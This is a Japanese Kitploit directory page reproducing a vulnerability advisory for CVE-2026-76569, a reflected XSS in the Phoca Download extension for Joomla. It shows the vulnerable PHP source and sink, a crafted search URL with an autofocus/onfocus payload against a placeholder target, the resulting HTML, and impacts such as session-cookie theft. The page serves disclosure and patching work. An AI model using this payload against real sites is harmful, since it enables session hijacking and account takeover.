Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-76569 — Phoca Download の検索 GET パラメータを介した Reflected XSS | Kitploit
ツール/GitHubGitHub/toanln-cov/cve-2026-76569
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

Phoca Download の検索 GET パラメータを介した Reflected XSS

リポジトリを見る
420日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Phoca Download の検索GETパラメータを介したReflected XSS

Phoca Download ≤ 6.1.4 — 認証済み攻撃者が細工した検索URLを介してユーザーコントロールパネルで任意のJavaScriptを実行

CVE CVSS v4.0 CWE-79 Affected Researcher


概要

Joomla用のPhoca Download(com_phocadownload)には、ユーザーコントロールパネルのファイル検索機能にReflected Cross-Site Scripting(XSS)の脆弱性が存在します。search GETパラメータは、strip_tags()のみを呼び出し"文字を保持するJoomlaの'string'フィルタで処理され、その後を使用せずにHTMLの属性にエコーバックされます。攻撃者は、細工したリンクをクリックする以外のユーザー操作を必要とせず、ページ読み込み時に被害者のブラウザで実行される任意のHTML属性やイベントハンドラを注入できます。

htmlspecialchars()
<input value="">

影響を受けるバージョン

コンポーネント脆弱性ありテスト環境修正済み
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

脆弱性の詳細

タイプ: Reflected Cross-Site Scripting(CWE-79) 必要な認証: 登録済みJoomlaユーザー(ログイン済み)+ ユーザーコントロールパネル有効(enable_user_cp = 1) CSRFトークンの必要性: 不要 — GETリクエストであり、このパスではCSRFトークンはチェックされません シンクファイル: site/views/user/tmpl/default_files_bootstrap.php

根本原因

searchパラメータは、strip_tags()のみを呼び出すJoomlaの'string'フィルタを使用して読み取られます。これにより"文字が保持され、攻撃者がvalue=""属性のコンテキストから抜け出して任意のHTML属性を注入できるようになります。

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — ソース

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // stored without encoding

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — シンク(脆弱性あり)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

同じ拡張機能の兄弟ビューであるphocadownloadlinkfileは、同じ検索フィールドに対してPhocaDownloadUtils::filterValue($search, 'text')(htmlspecialchars()と同等)を正しく適用しています。userビューは同じ保護を適用しておらず、拡張機能内で出力エンコーディングに一貫性がないことを示しています。


概念実証

1. 登録ユーザーとしてログイン

Joomlaのログインページに移動し、登録ユーザーとして認証します。ログイン成功後、Joomlaはユーザープロフィールページにリダイレクトし、アクティブなセッションを確認します。

testuserとしてログイン成功 — プロフィールページにリダイレクト

2. ユーザーコントロールパネルにアクセス(ベースライン)

PhocaDownloadユーザーコントロールパネルに移動します:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

ページは空の検索フィールド(value="")でレンダリングされます。これは注入前の通常の状態です。

ユーザーコントロールパネル — 空の検索フィールド、ベースライン状態

3. XSSペイロードを含む細工したURLを送信

以下の細工したURLに移動します(または生のペイロードを検索ボックスに直接入力します):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

XSSペイロードを含む細工したURLを検索パラメータに送信

ページが読み込まれると、注入されたautofocus属性が入力要素にフォーカスを当て、即座にonfocusイベントハンドラをトリガーします。それ以上のユーザー操作は必要ありません。

レンダリングされたHTML(脆弱性あり):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

影響

  1. セッションハイジャック — 攻撃者はdocument.cookieを介して被害者のJoomlaセッションCookieを盗み取り、資格情報なしで完全なアカウント乗っ取りを可能にします。
  2. 任意のJavaScript実行 — キーロギング、DOM操作、資格情報の収集、フィッシングページへのリダイレクトなど、任意のJavaScriptが被害者のブラウザセッションで実行されます。
  3. 権限昇格 — 管理者が認証済みの状態で細工したリンクをクリックした場合、攻撃者は管理者レベルのJavaScript実行を獲得し、管理パネル操作を介してサイト全体を侵害する可能性があります。

参考情報

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • GitHub Advisory: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • ベンダーリポジトリ: https://github.com/PhocaDesign/PhocaDownload
ツールをダウンロード